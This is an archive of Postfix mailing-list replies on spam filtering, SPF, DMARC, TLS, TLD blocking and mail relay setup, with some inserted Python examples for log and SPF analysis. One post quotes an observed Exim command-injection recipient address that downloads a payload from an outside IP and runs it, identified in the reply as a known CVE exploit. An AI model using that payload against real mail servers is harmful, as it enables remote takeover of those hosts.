Re: [External] Re: Outlook TLS errors after Microsoft Windows Update

2022-10-26 Thread Kevin A. McGrail

On 10/26/2022 10:56 AM, Viktor Dukhovni wrote:


On Wed, Oct 26, 2022 at 03:56:29PM +0200, Gerald Galster wrote:


This issue is resolved by update KB5018496 for Windows 11 22H2 x64:

https://support.microsoft.com/en-us/topic/october-25-2022-kb5018496-os-build-22621-755-preview-64040bea-1e02-4b6d-bad1-b036200c2cb3

October 25, 2022—KB5018496 (OS Build 22621.755) Preview
[...]
It addresses an issue that might affect some types of Secure Sockets
Layer (SSL) and Transport Layer Security (TLS) connections. These
connections might have handshake failures. For developers, the
affected connections are likely to send multiple frames followed by a
partial frame with a size of less than 5 bytes within a single input
buffer. If the connection fails, your app will receive the error,
“SEC_E_ILLEGAL_MESSAGE”.

There were perhaps additional resolved issues that were not mentioned,
since the PCAP files show no such packets.  However, if the immediate
issue is no longer reproducible, I guess that's progress.



I wanted to mention that the update also broke some of the older Adobe 
products we had in use because the DRM comms channels used TLS 1.0 and I 
believe it disabled everything by TLS 1.2 in Edge by default.


Not necessarily saying Microsoft's choice was bad but it points out 
Adobe's poor infrastructure for their DRM.


Regards,

KAM



Re: [External] What does AW mean - was - Re: AW: RSA and ECDSA - warning: No certs for key at index 1

2022-05-31 Thread Kevin A. McGrail

On 5/31/2022 10:18 AM, Bret Busby wrote:
I keep seeing "AW" prepended to message subjects and I have no idea of 
what it means.


What does it mean?

I believe it's the German equivalent for re: 
(https://en.wikipedia.org/wiki/List_of_email_subject_abbreviations) as 
in Regarding.


Regards,
KAM



Re: [External] Re: Why the name Postfix?

2022-03-28 Thread Kevin A. McGrail

Great Idea!  Done

On 3/27/2022 6:08 PM, lists wrote:

Perhaps someone who knows how to update wiki can add this information.

https://en.wikipedia.org/wiki/Postfix_(software)






Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

2021-10-12 Thread Kevin A. McGrail

On 10/11/2021 6:28 PM, Carl Brewer wrote:

http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
 for more information. 


Carl, I noticed this and wanted to mention if you are using something 
like Google's quad8 for your resolver?  If so, install a caching 
local nameserver.


No, I have my own bind running on my LAN.


Rhetorical question but what's your volume like because you are hitting 
some blocks for volume according to that.


Regards,

KAM







Re: [External] Re: turning off spamass-milter for authenticated submissions? SPF for submitted emails?

2021-10-11 Thread Kevin A. McGrail

On 10/11/2021 5:32 PM, Carl Brewer wrote:

 0.0 URIBL_BLOCKED  ADMINISTRATOR NOTICE: The query to URIBL was
    blocked.  See

http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
 for more information. 


Carl, I noticed this and wanted to mention if you are using something 
like Google's quad8 for your resolver?  If so, install a caching local 
nameserver.


You might also consider adding the KAM channel to your rules. Over 17 
years of publishing them for the world for free now: 
https://mcgrail.com/template/kam.cf_channel


Regards,

KAM






Re: [External] Postfix and Mimedefang for single user?

2021-03-28 Thread Kevin A. McGrail

Hi LuKreme,

I believe once you hook in MIMEDefang with postfix, it's a general 
purpose filter that uses the milter interface to process emails at 
various stages of the mail dialogue and processing.  It hurts my brain 
to think about whether Postfix could do a filter on the recipients and 
then hand-off things to MIMEDefang or not :-)


If you take a look at 
https://mcgrail.com/downloads/The%20Perl%20Conference%202019%20-%20%20Fighting%20Spam%20with%20Perl%20using%20Apache%20SpamAssassin%20&%20MIMEDefang%20.pdf 
you can get a demo filter at 
https://drive.google.com/file/d/1yu6cnEN_22A07_9ApvBxrvLs4iiAeeW1/view 
which helps you see the hooks available.


You could add a function in filter_recipient to set a global variable 
that you don't want to do any processing unless a specific recipient is 
involved.  Then you could add logic elsewhere to use that variable.


Regards,

KAM

On 3/27/2021 12:49 PM, @lbutlr wrote:

I would like postfix to send mail being delivered to a specific virtual user 
user on to mimedefang, but the instructions that I see on setting up mimedefang 
are just to set it up as a general milter.

Or do I need to configure mime defang itself to only process the mail to that 
user?

Also, right now it is setup with

-s /var/spool/MIMEDefang/mimedefang-multiplexor.sock

Does it need to be a port instead?

(Most of the stuff I can find is about a decade old and the rest is even older, so 
I have little confidence)









Re: [External] Re: Deprecated: white is better than black

2021-02-24 Thread Kevin A. McGrail
If it helps with others, the SA project uses WelcomeList and BlockList 
so you don't have to change acronyms like RBL.  Some slides from a talk 
at 
https://mcgrail.com/downloads/DevFest%202020%20-%20Removing%20Racially%20Charged%20Language%20from%20Technology%20Speaker%20Presentation%20GDG%20Devfest%20UK%20&%20Ireland%202020%20-%20KAM%20FINAL.pdf 
might be interesting too.


On 2/24/2021 12:37 PM, Curtis Maurand wrote:

I totally agree with this and I am going to work to scrub the prior terminology 
from my system.

Thank you, Wietse

—Curtis



On Feb 24, 2021, at 12:12 PM, Wietse Venema  wrote:

The following is from the postfix-3.6-20210221 release notes.

Wietse

Postfix version 3.6 deprecates terminology that implies white is
better than black. Instead, Postfix prefers 'allowlist', 'denylist',
and variations on those words.

Noel Jones assisted with the initial transition.

Changes in documentation
--

Documentation was updated to use 'allowlist', 'denylist', etc.
These documentation changes do not affect Postfix behavior.

Changes in parameter names
--

The following parameters replace names that contain 'blacklist' or
'whitelist':

postscreen_allowlist_interfaces
postscreen_denylist_action
postscreen_dnsbl_allowlist_threshold

These new parameters have backwards-compatible default settings
that support the old parameter names, so that the name change should
not affect Postfix behavior. This means that existing management tools
that use the old parameter names should keep working as before.

This compatibility safety net may break when some management tools
use the new parameter names, and some use the old names, such that
different tools will disagree on how Postfix works.

Changes in logging
--

The following logging replaces forms that contain 'blacklist' or
'whitelist':

postfix/postscreen[pid]: ALLOWLIST VETO [address]:port
postfix/postscreen[pid]: ALLOWLISTED [address]:port
postfix/postscreen[pid]: DENYLISTED [address]:port

To avoid breaking logfile analysis tools, Postfix keeps logging the old
forms by default, as long as the compatibility_level parameter setting
is less than 3.6, and the respectful_logging parameter is not explicitly
configured. As a reminder, Postfix will log the following:

postfix/postscreen[pid]: Using backwards-compatible default setting
respectful_logging=no for client [address]:port

To keep logging the old form, make the setting "respectful_logging =
no" permanent in main.cf, for example:

# postconf "respectful_logging = no"
# postfix reload

To stop the reminder, configure the respectful_logging parameter to
"yes" or "no", or configure "compatibility_level = 3.6".

--




*Kevin A. McGrail*
/CEO Emeritus/
*Peregrine Computer Consultants Corporation*
+1.703.798.0171 kmcgr...@pccc.com
 https://pccc.com/  https://raptoremailsecurity.com

10311 Cascade Lane, Fairfax, Virginia 22032-2357 USA
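The release notes quoted above mean a log analyzer will keep seeing the old WHITELISTED / BLACKLISTED / WHITELIST VETO forms from hosts still below compatibility_level 3.6, alongside the new ALLOWLISTED / DENYLISTED / ALLOWLIST VETO forms. The parser below is an added example in Python, not anything shipped with Postfix; it normalizes both forms onto one verdict name and counts the respectful_logging reminder lines. The log lines are constructed.

```python
import re
from collections import Counter

# Constructed sample syslog lines (not from a real server).  The old forms
# appear while compatibility_level < 3.6 and respectful_logging is unset.
SAMPLE_LOG = """\
Feb 24 12:00:01 mx postfix/postscreen[4242]: Using backwards-compatible default setting respectful_logging=no for client [192.0.2.10]:51234
Feb 24 12:00:01 mx postfix/postscreen[4242]: WHITELISTED [192.0.2.10]:51234
Feb 24 12:00:02 mx postfix/postscreen[4242]: BLACKLISTED [198.51.100.7]:40001
Feb 24 12:00:03 mx postfix/postscreen[4242]: WHITELIST VETO [203.0.113.5]:33001
Feb 24 12:00:04 mx postfix/postscreen[4243]: ALLOWLISTED [192.0.2.11]:51235
Feb 24 12:00:05 mx postfix/postscreen[4243]: DENYLISTED [198.51.100.8]:40002
Feb 24 12:00:06 mx postfix/postscreen[4243]: ALLOWLIST VETO [203.0.113.6]:33002
Feb 24 12:00:07 mx postfix/smtpd[4250]: connect from unknown[198.51.100.9]
"""

NEW_FORMS = {"ALLOWLISTED", "DENYLISTED", "ALLOWLIST VETO"}

# Map the pre-3.6 forms and the 3.6 forms onto one canonical verdict name.
VERDICT_ALIASES = {
    "WHITELISTED": "ALLOWLISTED",
    "BLACKLISTED": "DENYLISTED",
    "WHITELIST VETO": "ALLOWLIST VETO",
    "ALLOWLISTED": "ALLOWLISTED",
    "DENYLISTED": "DENYLISTED",
    "ALLOWLIST VETO": "ALLOWLIST VETO",
}

# Longer alternatives first so "ALLOWLIST VETO" is not cut short as "ALLOWLIST".
VERDICT_RE = re.compile(
    r"postfix/postscreen\[(?P<pid>\d+)\]: "
    r"(?P<verdict>WHITELIST VETO|ALLOWLIST VETO|WHITELISTED|BLACKLISTED"
    r"|ALLOWLISTED|DENYLISTED) "
    r"\[(?P<addr>[^\]]+)\]:(?P<port>\d+)$"
)
REMINDER_RE = re.compile(
    r"postfix/postscreen\[\d+\]: Using backwards-compatible default setting "
    r"respectful_logging=no for client \[[^\]]+\]:\d+$"
)


def parse_postscreen(log_text):
    """Return (events, reminder_count).

    Each event carries the canonical verdict, whether the line used the
    legacy spelling, and the client address/port postscreen logged.
    """
    events, reminders = [], 0
    for line in log_text.splitlines():
        m = VERDICT_RE.search(line)
        if m:
            events.append({
                "pid": int(m["pid"]),
                "verdict": VERDICT_ALIASES[m["verdict"]],
                "legacy_form": m["verdict"] not in NEW_FORMS,
                "addr": m["addr"],
                "port": int(m["port"]),
            })
        elif REMINDER_RE.search(line):
            reminders += 1
    return events, reminders


def summarize(log_text):
    """Aggregate verdict counts; a non-zero legacy count or reminder count
    tells the operator which hosts still need respectful_logging settled."""
    events, reminders = parse_postscreen(log_text)
    return {
        "verdicts": dict(Counter(e["verdict"] for e in events)),
        "legacy_lines": sum(1 for e in events if e["legacy_form"]),
        "reminders": reminders,
        "denylisted_clients": sorted(
            e["addr"] for e in events if e["verdict"] == "DENYLISTED"),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```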



Re: [External] SPAM attack from bounce techniques

2020-12-29 Thread Kevin A. McGrail

On 12/29/2020 7:37 AM, Rafael Azevedo wrote:

Hi there,

I've noticed that one of our servers is receiving a huge amount of 
unauthorized requests.


User connects to our server and tries to send an email to any 
destination. Our servers denies the message because user is not 
authenticated. Then, a bounce is generated to the source address, 
which was fake and turns to be the final destination, so at the end, 
the email is actually sent as a bounce, proliferating lots of spam.


Is there a way to avoid this?


Hi Rafael, This sounds like backscatter.  To avoid it, you need to 
reject the email during the real-time SMTP dialog with the sender, i.e. 
during the connection from the sender, if it's an invalid recipient, 
reject with 5xx.  This will cause you to tell the sending server and you 
don't generate a bounce.


The question is: Why are you accepting the email, then determining it's 
invalid, and creating a bounce?  I would typically look at some sort of 
architecture issue where you haven't done what we call promoted the 
valid users to the edge of your internet connection.


Hope this helps and share more information for more guidance.


Regards,
KAM




Re: [External] Re: postfix and MX

2020-09-17 Thread Kevin A. McGrail
On 9/17/2020 9:20 PM, Antonio Leding wrote:
>
> I stopped believing long ago that Microsoft adhered to any standard in
> earnest.  To me, they always seemed to be more about
> implanting new standards that the world would then follow…
In fairness, Microsoft's embrace/extend/extinguish plans are well known
but I also think a thing of the past.  I've been pretty impressed by
their netizenship in the past decade.  Not saying it didn't take the US
DoJ for a wake-up call but really impressed with what I've seen.  Is
there a specific and recent example you can think of?

Regards,
KAM


Re: [External] spam uses my email address as sender in "header from"

2020-09-14 Thread Kevin A. McGrail
On 9/14/2020 6:35 AM, Fourhundred Thecat wrote:
> Can I reject messages that have different envelope from and header from?
>
> Or what would be the best approach ? 


Are you publishing an SPF record?  Are you using DKIM?  Are you
publishing a DMARC policy (even one with policies of none)?  Are you
using Apache SpamAssassin?

Regards,
KAM



Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail


On 6/8/2020 9:54 AM, vi...@vheuser.com wrote:
>
> On 2020/06/08 09:31 AM, Kevin A. McGrail wrote:
>> On 6/8/2020 9:06 AM, John Dale wrote:
>>> Why does this agitate people?  Because if the time spend on this
>>> change had been used to fix an actual deficiency, people of color who
>>> use the software would have been served with value, not just
>>> platitudes.
>> Sounds like a lot of pontificating.  Can you back up this stance with
>> your CV related to open source software, please?
>>
>> Are you a committer, contributor, supporter, sponsor or member of any
>> OSS project or OSS organization?
>>
> Perfect.
> The ad hominem argument fits in perfectly with the rest of this drivel.
>   The unrestrained snowflakes seeking to harass everyone else off the
> list.
>     Can we get back to work or do we all have to unsubscribe because
> of an abusive few? 

I question why you think you have a seat at the table on the
decision-making process for how these open source software projects operate?
For example, at the ASF, we are not a democracy but a meritocracy.

So I am not attacking you but yes, I am questioning your merit to speak
on the matter.  Lots of people have ideas and thoughts.  Very few people
take action like Wietse and do the work.  So to me, your opinion on the
change compared with Wietse's opinion are not equal.  You may look at
this as an ad hominem.  I look at it as establishing whether you are or
are not a subject matter expert in the field of OSS and giving you the
opportunity to establish why your opinion should be taken seriously.

Regards,

KAM



Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 9:06 AM, John Dale wrote:
> Why does this agitate people?  Because if the time spend on this
> change had been used to fix an actual deficiency, people of color who
> use the software would have been served with value, not just platitudes. 
Sounds like a lot of pontificating.  Can you back up this stance with
your CV related to open source software, please? 

Are you a committer, contributor, supporter, sponsor or member of any
OSS project or OSS organization?

Regards,
KAM




Re: [External] Re: The historical roots of our computer terms

2020-06-08 Thread Kevin A. McGrail
On 6/8/2020 8:37 AM, Phil Stracchino wrote:
> The color is widely and somewhat sardonically known as 'bleen' or 'grue'.
See, that's just wrong. We all know what a Grue is...
Regards,
KAM
https://zork.fandom.com/wiki/Grue


Re: [External] Re: The historical roots of our computer terms

2020-06-06 Thread Kevin A. McGrail

On 6/6/2020 11:00 AM, Ian Evans wrote:
>
>
> On Sat, Jun 6, 2020, 10:28 AM Kevin A. McGrail <kmcgr...@pccc.com> wrote:
>
> Thanks for the reminder on this.  The Apache SpamAssassin project
> voted to do this change on May 3rd and I'm taking the baton to
> bring it to fruition.
>
>
>
> Kevin, that's interesting that SpamAssassin had already voted on this
> back in May. As Larry just illustrated, some will view Leah Culver's
> software industry proposal as an example of political correctness.
> Others will argue the etymology is based on light and dark and
> religion and not race. As I said, her post was food for thought.
> Whether people want to ponder the menu is up to the programmers for now.

Our project didn't disagree that it's political correctness; we just don't
feel there is any problem with being correct.  Leah's note was not the
impetus for this; it was this article on April 5th that I brought to the
attention of our project management committee.
https://www.zdnet.com/article/uk-ncsc-to-stop-using-whitelist-and-blacklist-due-to-racial-stereotyping/

After discussion for a month, a vote was called and passed with all
+1's.  My only regret is that I didn't think to do this some 20 years ago.

Regards,

KAM




Re: [External] Re: The historical roots of our computer terms

2020-06-06 Thread Kevin A. McGrail
Thanks for the reminder on this.  The Apache SpamAssassin project voted
to do this change on May 3rd and I'm taking the baton to bring it to
fruition.

Regards,
KAM

On 6/6/2020 10:20 AM, Wietse Venema wrote:
> Ian Evans:
>> Food for thought from the co-author of OAuth and oEmbed. How easy would it
>> be for Postfix/Postscreen configs/docs to, say, refer to allow/deny lists?
> Easily, if they can be accessed via DNSBL/DNSWL queries. Any 'new'
> lookup mechanism will have to be added through a postscreen policy
> plugin, and that involves new Postfix code.
>
> For context: Postscreen decides if a remote SMTP client is allowed
> to talk to a Postfix SMTP service. The decision is made on (protocol)
> behavior and reputation, plus a static allow/deny list that is
> typically populated with information from major provider SPF records.
>
>   Wietse
>
>> Leah Culver (@leahculver) tweeted at 11:32 PM on Fri, Jun 05, 2020:
>> I refuse to use "whitelist"/"blacklist" or "master"/"slave" terminology for
>> computers. Join me. Words matter.
>> (https://twitter.com/leahculver/status/1269109776983547904?s=03)



OFF-TOPIC: Re: [External] Re: why DMARC PASS even SPF got failed

2020-04-28 Thread Kevin A. McGrail
> Scott, I have another question.

Gents, I love geeking about email and spam techniques but these are not
postfix related nor do they relate to beer*.  IMO these should be
discussed elsewhere.

Regards,

KAM

* There are some mailing lists with exclusions that discussions on beer
are always on-topic.



Re: [External] command injection by crafted recipient address

2020-03-12 Thread Kevin A. McGrail


On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

It's an exim exploit.  See CVE-2019-15846.

Regards,

KAM



Re: [External] Re: SPF IP addresses limit question

2020-02-24 Thread Kevin A. McGrail
On 2/23/2020 11:30 PM, Mohamed Lrhazi wrote:
>
> My question still was: Suppose I comply with all the
> recommendations and best practices in composing my SPF records... Do I
> still need to worry about the number of IP addresses (v4/v6/ciders)
> that I put in each record?

Yes. In the anti-spam world, we analyze SPF records for indicators that
they are overly broad and non-specific as an indicator of a lack of
postmaster hygiene.  And if your SPF is poorly done and others can spoof
your domain by having adjacent IPs, that's bad too!  Make your SPF
record as accurate and minimal as you can for the best results.

Regards,

KAM



Re: [External] Re: SPF IP addresses limit question

2020-02-23 Thread Kevin A. McGrail
On 2/23/2020 7:08 PM, Scott Kitterman wrote:
> The limits are a function of DNS, not SPF, which is why RFC 7208 Section 3.4
> was written.

I would say there is also a somewhat arbitrary limit that was picked that
doesn't match the real world.  See
https://bz.apache.org/SpamAssassin/show_bug.cgi?id=7182 for why we
raised from 10 to 15 to 20 lookups on the Apache SpamAssassin project.

Regards,

KAM
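Both SPF posts above, the one on overly broad records that let neighbouring IPs spoof a domain and the one on the DNS-lookup limit (10 in RFC 7208, raised to 20 in Apache SpamAssassin), can be checked statically from the record text. The analyzer below is an added example, not SpamAssassin's or Postfix's own code: it counts the RFC 7208 lookup-costing terms of one record without following includes, sums the address space the record vouches for, and flags broad blocks and permissive "all" qualifiers. The prefix-length thresholds and the sample records are assumptions.

```python
import ipaddress
import re

# RFC 7208 section 4.6.4: each of these mechanisms (and the redirect=
# modifier) costs a DNS lookup, capped at 10 per evaluation.
LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists"}
RFC_LOOKUP_LIMIT = 10
MODIFIER_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_.-]*=")

# Constructed sample records (example.* names only).
TIGHT_RECORD = "v=spf1 ip4:192.0.2.10 ip4:192.0.2.0/28 mx -all"
BROAD_RECORD = (
    "v=spf1 ip4:198.51.100.0/16 "
    + " ".join(f"include:{c}.example" for c in "abcdefghi")
    + " a mx ptr ?all"
)


def analyze_spf(record, max_prefix_v4=24, max_prefix_v6=64):
    """Statically inspect one SPF TXT record: no DNS, includes not followed.

    Returns lookup count, total addresses vouched for, and hygiene findings.
    The prefix thresholds are assumed values, not anything from the RFC.
    """
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return {"valid": False, "lookups": 0, "addresses": 0,
                "findings": ["missing v=spf1 version tag"]}
    lookups, addresses, findings = 0, 0, []
    for term in terms[1:]:
        if MODIFIER_RE.match(term):            # name=value modifiers
            if term.split("=", 1)[0].lower() == "redirect":
                lookups += 1
            continue
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.split("/")[0].lower()      # drop dual-cidr suffix (a/24)
        if mech in LOOKUP_MECHANISMS:
            lookups += 1
            if mech == "ptr":
                findings.append("ptr is deprecated by RFC 7208 and slow to evaluate")
        elif mech in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            addresses += net.num_addresses
            limit = max_prefix_v4 if net.version == 4 else max_prefix_v6
            if net.prefixlen < limit:
                findings.append(
                    f"{mech}:{arg} is broader than /{limit}; other hosts in that "
                    "block could spoof this domain")
        elif mech == "all" and qualifier in "+?":
            findings.append(f"'{qualifier}all' lets any host pass; use -all or ~all")
    if lookups > RFC_LOOKUP_LIMIT:
        findings.append(
            f"{lookups} lookup terms exceed the RFC 7208 limit of "
            f"{RFC_LOOKUP_LIMIT}; strict receivers return permerror")
    return {"valid": True, "lookups": lookups, "addresses": addresses,
            "findings": findings}


if __name__ == "__main__":
    for rec in (TIGHT_RECORD, BROAD_RECORD):
        print(rec, "->", analyze_spf(rec))
```

The lookup count is a lower bound: every include and redirect pulls in a further record whose own terms also count toward the same limit.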



Re: [External] Block email based on reply field

2019-12-11 Thread Kevin A. McGrail
If you have integrated with Apache SpamAssassin, then v3.4.3 introduces
the ability to do RBL lookups on the domain in Reply-to as well as the
ability to do hashed lookups.

Regards,
KAM

On 12/11/2019 9:38 PM, li...@lazygranch.com wrote:
> I have a spammer who uses all sorts of "from" addresses but the same
> "reply" address. Any way to block this spammer in Postfix. 



Re: block 'new style' TLDs ?

2019-11-02 Thread Kevin A. McGrail

On 11/2/2019 2:38 PM, John Schmerold wrote:
> On 10/24/2019 12:32 AM, @lbutlr wrote:
>> On 23 Oct 2019, at 15:20, lists  wrote:
>>> /\.asia$/ 510 Denied: Unacceptable TLD .asia
>> [Long list… removed]
>>
>> smtpd_helo_restrictions = reject_invalid_helo_hostname
>>  check_helo_access pcre:/etc/postfix/helo_checks.pcre permit
>>
>> /etc/postfix/helo_checks.pcre:
>> /.*\.(com|net|org|edu|gov|ca|mx|de|dk|fi|fr|uk|us|tv|info|biz|eu|es|il|it|nl|name|jp|host|au|nz|ch|tv)$/
>> DUNNO
>> /.*\.*$/ 550 Mail to or from this TLD is not allowed
>>
>>
>> Of course your list will differ than mine, but I find this much
>> better than reacting to which of these new garbage TLDs are spamming
>> me this week.
>
> You can achieve a similar result with this addition to SA's custom.cf:
>
> header GC_TLD_COM_R Received !~/\.(?:com|net|org|edu|uk|us|gov)\b/i
> score GC_TLD_COM_R 3.2
>
> header GC_TLD_COM_F From !~/\.(?:com|net|org|edu|uk|us|ca|gov)\b/i
> score GC_TLD_COM_F 3.2
>
> If I were a bit more worldly, I would add a few more country codes.
>

Just some additions to John's ideas:

If you search TLD in KAM.cf (http://www.mcgrail.com/downloads/KAM.cf),
you'll see some examples of how to do this.

There is also a new feature for WLBLEval plugin (see
https://bz.apache.org/SpamAssassin/show_bug.cgi?id=7354) which is in
trunk and in the release candidate for 3.4.3. 

That lets you do something like:

enlist_addrlist (SUSPECTTLDS) *@*.politicians
enlist_addrlist (SUSPECTTLDS) *@*.spammer

header __FROM_SUSPECT_TLD eval:check_from_in_list('SUSPECTTLDS')

Take a look.  We can also use help testing the release candidate[1].


Regards,

KAM


[1]

3.4.3 release candidate 5 is now available at 
http://talon2.pccc.com/~kmcgrail/devel/




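A TLD policy like the helo_checks.pcre table and the enlist_addrlist globs discussed in this thread is easy to get wrong, so it is worth testing against sample names before deploying it. The emulator below is an added example, not code from Postfix or SpamAssassin: it applies first-match-wins pcre access-table semantics (patterns case-insensitive, DUNNO means "no opinion, keep evaluating") and SpamAssassin-style "*" globbing for address lists. The table contents are constructed; note that a bare catch-all pattern also rejects IP-literal HELO names such as [192.0.2.1].

```python
import re

# Constructed pcre: access table modelled on the quoted helo_checks.pcre.
# A pattern with no '^' anchor is searched anywhere in the name, as in Postfix.
HELO_TABLE = [
    (r"\.(com|net|org|edu|gov|ca|mx|de|uk|us|eu|info|biz|name|au|nz|ch)$", "DUNNO"),
    (r".", "550 Mail to or from this TLD is not allowed"),   # catch-all
]


def compile_table(table):
    """Postfix pcre tables are case-insensitive unless the pattern says otherwise."""
    return [(re.compile(pattern, re.IGNORECASE), action) for pattern, action in table]


HELO_COMPILED = compile_table(HELO_TABLE)


def helo_access(helo_name, compiled=HELO_COMPILED):
    """Emulate check_helo_access pcre:/path: first matching pattern wins.

    Returns the action string ("DUNNO", "550 ...") or None when nothing
    matched, in which case the restriction list simply continues.
    """
    for regex, action in compiled:
        if regex.search(helo_name):
            return action
    return None


def glob_to_regex(pattern):
    """SpamAssassin address-list globs: '*' spans any text (dots included),
    '?' matches one character; the whole address must match."""
    escaped = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.compile("^" + escaped + "$", re.IGNORECASE)


# enlist_addrlist (SUSPECTTLDS) *@*.politicians / *@*.spammer, as quoted above.
SUSPECT_TLDS = [glob_to_regex(p) for p in ("*@*.politicians", "*@*.spammer")]


def from_in_list(address, compiled_globs=SUSPECT_TLDS):
    """Emulates check_from_in_list('SUSPECTTLDS') for one From: address."""
    return any(regex.match(address) for regex in compiled_globs)


if __name__ == "__main__":
    for name in ("mail.example.com", "smtp.example.politicians", "[192.0.2.1]"):
        print(f"HELO {name:28} -> {helo_access(name)}")
    for addr in ("bob@vote.politicians", "bob@example.com"):
        print(f"From {addr:28} -> {from_in_list(addr)}")
```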



Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
On 9/16/2019 11:00 AM, Benny Pedersen wrote:
> Kevin A. McGrail wrote on 2019-09-16 16:19:
>> Fair enough.  Maybe he should turn that feature on then :-)
>
> if you do you can't receive email from me
>
> validMX is strict to say domains without MX is invalid domain ?
>
> oh and MX failback is not a rfc ?
>
> be careful testing with "sendmail -bv u...@example.org" and check how
> badly sendmail do it
Benny, you and I correspond and I use the netValidMX.  Not sure what you
are trying to say.


Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
Fair enough.  Maybe he should turn that feature on then :-)

On 9/16/2019 9:59 AM, Bill Cole wrote:
>
> I don't believe that Net::validMX does anything more *at the domain
> level* than Postfix's built-in reject_unknown_sender_domain
> restriction. Its check_email_validity() may be a bit more strict than
> Postfix's built-in address sanity checks. 



Re: Refuse mail from hosts with closed port 25

2019-09-16 Thread Kevin A. McGrail
On 9/16/2019 9:03 AM, Jim Reid wrote:
> On 16 Sep 2019, at 13:47, Paul van der Vlis  wrote:
>
> How can I refuse mail from hosts who don't have an open port 25?
Paul, I wrote a module which I need to update on Perl's CPAN called
Net::validMX that we use to reject IPv4 domains that aren't properly
setup to receive mail from sending to us.  We've used it in production
with MIMEDefang.  And as a small, boutique ESP for over a decade, likely
closer to 15 years with no complaints/FPs of note.
Regards,
KAM


OFF-TOPIC - Re: Adding DKIM and DMARC

2019-08-25 Thread Kevin A. McGrail
On 8/25/2019 11:49 AM, @lbutlr wrote:
> When adding DMARC and DKIM do I only need to add it to the domain that is 
> hosting the mail server (MX)?
>
> For example, if mail.example.com is defined as the MX for example.com and 
> example.net, do I need to add the DMARC/DKIM records to example.net’s DNS as 
> well?
DKIM and DMARC are records for a domain.  They don't care about MX records.

Example.com and example.net both need records.

Regards,
KAM


Re: ODMR/ATRN ?

2019-06-09 Thread Kevin A. McGrail
On 6/9/2019 6:18 PM, Ronald F. Guilmette wrote:
> Thank you, but I need to be frank. 

I thought you were Ronald?  :-)

> I believe that I understand fully how to handle my outbound email traffic,
> i.e. treating my (soon to be) cloud VM running Postfix as a "smarthost"
> for outbound.  That part is the easy part, and also the simple part.
>
> The harder part is handing the inbound email traffic for my several domains.
>
> I *think* that I *may* perhaps understand your suggestion with regards to
> that, but I'll have to think about it awhile longer before I can be sure.
>
> I wish that I had an example to look at, or some slightly-more-detailed
> write-up to refer to that would show me how to configure this exact approach
> with Postfix.
>
> But if worse comes to worse, I can probably puzzle it all out, starting from
> just what you said, above.
>
> One part that I'm sure that I -do not- understand is why you suggeted an
> alternative port number.  Can you explain? 

Almost every residential ISP will block ports like 25 and 80 so you
can't run servers on the connections.  You have a static IP and usually
that means they don't block ports.  When you switch away from that
solution, I expect you will see that change.

So you have a domain, tristatelogic.com.

- You get a VM on AWS w/CentOS.
- You put an Elastic IP on it so it is static.
- You create a security group that allows 25 and 22 from /0 inbound to
the box
- You create an A record called mail.tristatelogic.com pointed to the IP
- You open a ticket with AWS for the reverse pointer for the box and to
remove smtp throttling
- You configure mail.tristatelogic.com to accept relay mail for the domain
tristatelogic.com.
- Setup SMTP Auth so that someone has to authenticate to send email outbound
- Setup a transport to deliver mail for tristatelogic.com to
local.tristatelogic.com on port 2525

At your home:

- Setup your postfix server so it works like you want called something
like local.tristatelogic.com
- Configure/Purchase a Dynamic DNS service so that something like
ronald.dyndns.something is a CNAME for local.tristatelogic.com so that
your mail works when your ISP changes your IP
- On the firewall at your house, port forward an alternate port such as
2525 to 25 on the postfix server on a static internal IP behind your
firewall
- Setup postfix on local.tristatelogic.com to smarthost with SMTP auth
through mail.tristatelogic.com

Also recommend on both local and mail boxes, you install Let's Encrypt
certs so you can require TLS for all the mail going between
mail.tristatelogic.com and local.tristatelogic.com.  You'll also get
opportunistic TLS for places that support it.

This will let you have inbound and outbound mail working from a server
on a residential grade connection.

As a homework exercise for the reader will be picking better names for
the boxes.  I suggest disney characters, firefly | star (trek|wars)
canon or dilbert characters.  ratbert and dilbert would get at least a
B+ from me.

Regards,

KAM



Re: ODMR/ATRN ?

2019-06-09 Thread Kevin A. McGrail
Well, first, my firm's commercial Raptor anti-spam solution supports
smarthosting for outbound and inbound on an alternate port.  Add any
dynamic DNS solution and you are good to go.  Plus you get the best
business anti-spam solution.  Happy to chat more about pricing. 

But that leads to my answer.  You can just setup a box on a VM with a
static IP and do smtp authentication for smarthosting through that box
and use it as a relay for your domain on an alternate port using Dynamic
DNS.  No need for fetchmail or anything like that.

Regards,
KAM



On 6/9/2019 4:42 PM, Ronald F. Guilmette wrote:
> I'd very much like to move my (Postfix) mail server, which currently resides
> on a (static IP) end-luser broadband line, to some VM in the cloud someplace,
> and then use something like fetchmail to poll that periodically to pull
> down all mail for my several domains and then have fetchmail re-inject
> all of those mail messages into the local Postfix.  The plan would be to
> get all this running and then give up my local static IP here, exchanging
> it for a dynamic one instead.  (This will save me a tiny bit of money on
> my monthly local ISP bill.)
>
> Googling for options just now, it sure sounds like ODMR/ATRN would fit
> my needs nicely, however I can't quite make out whether any of this
> ODMR/ATRN stuff has ever actually been implemented in Postfix or not.
> Has it been?
>
> Regardless of whether it has or not, if anyone wants to suggest or recommend
> any alternative solution(s) I'm all ears.  I am open to anything that
> will get the job done.  My only real requirements for a solution are:
>
> 1)  Must support unlimited email addresses per each recipient domain.
>
> 2)  Must preserve envelope sender information.
>
> In general, speed is not an issue, but security most certainly is.
>
> That having been said, I am not eager to use Jakob Hirsh's odmrd because
